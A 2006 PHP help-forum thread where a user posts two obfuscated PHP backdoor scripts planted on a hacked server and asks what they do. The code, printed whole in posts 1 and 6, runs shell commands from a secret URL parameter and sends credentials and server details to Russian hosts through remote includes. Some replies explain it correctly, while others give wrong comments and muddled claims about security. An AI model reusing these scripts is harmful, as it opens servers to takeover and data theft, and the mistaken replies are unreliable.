Jump to content


Photo

just need to know what this code does...


  • Please log in to reply
16 replies to this topic

#1 joecooper

joecooper
  • Members
  • PipPipPip
  • Advanced Member
  • 358 posts

Posted 18 July 2006 - 01:03 AM

can someone in detail explain what exactly this code does? thanks. i good with php but this looks complex to me!

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Signature:
[/a]
[a href="http://www.planet-so...=1999&lngWId=8" target="_blank"]EzLogin 1.0[/a]
[a href="http://www.essexracers.com" target="_blank"]Essexracers.com[/a]
Msn Messenger: joe@joeyjoe.co.uk

#2 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 18 July 2006 - 01:08 AM

name
password
url


<?php
error_reporting(0);// error reporting off

if(isset($_POST["l"]) and isset($_POST["p"])){ // post name and password

if(isset($_POST["input"])){$user_auth="&l=".
base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
// post name and password encode them.


else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}//post name and password encoded


if(!isset($_POST["log_flg"])){$log_flg="&log";}
// if name and password exiat encoded


if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
// decode the name password and the url via ip


{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
//get name and password if active and post information
?>
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#3 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:11 AM

did you get hacked joe?

cause this looks like part of the authentication for a hacking script...it sends info to a russian site to verify the username and password, and if it returns a certain value, executes some system commands.

#4 joecooper

joecooper
  • Members
  • PipPipPip
  • Advanced Member
  • 358 posts

Posted 18 July 2006 - 01:16 AM

i didnt get hacked, but someone i know has. and that was the scipt that was uploaded


i see now. i decoded the base64 code and it returned

http://bis.iframe.ru...ter.php?r_addr=
Signature:
[/a]
[a href="http://www.planet-so...=1999&lngWId=8" target="_blank"]EzLogin 1.0[/a]
[a href="http://www.essexracers.com" target="_blank"]Essexracers.com[/a]
Msn Messenger: joe@joeyjoe.co.uk

#5 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:18 AM

I have a friend get hacked as well over the past week.  He ended up with a hacker script that opens up a huge backdoor...luckily the hacker wasn't smart and named it something very obvious, so he was able to quickly pick it out from all his other scripts.

#6 joecooper

joecooper
  • Members
  • PipPipPip
  • Advanced Member
  • 358 posts

Posted 18 July 2006 - 01:19 AM

how about this code that was also uploaded

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

Signature:
[/a]
[a href="http://www.planet-so...=1999&lngWId=8" target="_blank"]EzLogin 1.0[/a]
[a href="http://www.essexracers.com" target="_blank"]Essexracers.com[/a]
Msn Messenger: joe@joeyjoe.co.uk

#7 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 18 July 2006 - 01:25 AM

ip.
88.151.116.6

company url
http://ns0.ru/

the above code seems to be able to get and add database information to another database ok.
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#8 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:26 AM

Same type thing, but this time it sends all of your server information:
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
to a server somewhere...if the first one fails, it goes to a second.

#9 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:27 AM

looks like the two servers are:

http://user9.mshtml.ru
http://user7.htmltags.ru

#10 joecooper

joecooper
  • Members
  • PipPipPip
  • Advanced Member
  • 358 posts

Posted 18 July 2006 - 01:29 AM

how can a php script open a back door tho? it cant exactly edit files unless they are chmod 777... and not many people have many folders set as chmodd
Signature:
[/a]
[a href="http://www.planet-so...=1999&lngWId=8" target="_blank"]EzLogin 1.0[/a]
[a href="http://www.essexracers.com" target="_blank"]Essexracers.com[/a]
Msn Messenger: joe@joeyjoe.co.uk

#11 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 18 July 2006 - 01:33 AM

the url are part of the first url i posted.

Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#12 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:35 AM

once the script is on your server it can do a chmod on them just like you can.  I set up a VM and ran the script that was left on my friends server...I was able to see the entire directory structure...the hd, the cd drive, the floppy drive...I could execute command line scripts and such...I could manipulate any of the files on the server I wanted.

In his particular case there is a security hole in one of the earlier versions of the smf bridge for joomla that the hacker exploited. 

#13 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 18 July 2006 - 01:42 AM

most hackers can upload a code that is also in a photo then the code posts information back to the hacker.

The hacker is only intrested in the open ports to meachines hanging off the server for example a credit card server.

there are thousands of tolls and thosands of holes in computer programs i know for a fact that large well known companys out there have got vanable hotspots on operating systems to get into all meachines linked to the net.

in reel reality there is no such thing as secuity as were like to know it, there will always be back doors to all programs as computer developers use hackers there self for development fact.
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#14 joecooper

joecooper
  • Members
  • PipPipPip
  • Advanced Member
  • 358 posts

Posted 18 July 2006 - 01:44 AM

how do you mean by they can upload code in a photo. do you mean they have a .php file labled as a .jpg.... because the server wouldnt parse this as a phpfile, would only output the code to the user
Signature:
[/a]
[a href="http://www.planet-so...=1999&lngWId=8" target="_blank"]EzLogin 1.0[/a]
[a href="http://www.essexracers.com" target="_blank"]Essexracers.com[/a]
Msn Messenger: joe@joeyjoe.co.uk

#15 hitman6003

hitman6003
  • Members
  • PipPipPip
  • Advanced Member
  • 1,807 posts

Posted 18 July 2006 - 01:44 AM

.gif files can contain executable code.

EDIT:  Not php, but other languages...not sure which...never looked into it.

#16 redarrow

redarrow
  • Members
  • PipPipPip
  • Advanced Member
  • 7,308 posts
  • Locationlondon

Posted 18 July 2006 - 01:51 AM

the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.

unix programing with meachine code is like owning a bank lol........................
Wish i new all about php DAM i will have to learn
((EMAIL CODE THAT WORKS))
http://simpleforum.ath.cx/mail2.inc
((PAYPAL INTEGRATION THAT WORKS))
http://simpleforum.a...aypal1_info.inc

#17 trq

trq
  • Staff Alumni
  • Advanced Member
  • 31,041 posts

Posted 18 July 2006 - 03:49 AM

the most powerfull hackers that are around are the ones involved in unixs thats why linux is a cut down version.

What are you babling about?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users